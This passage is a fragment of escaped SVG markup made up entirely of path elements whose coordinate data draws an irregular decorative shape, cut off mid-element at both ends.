d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path 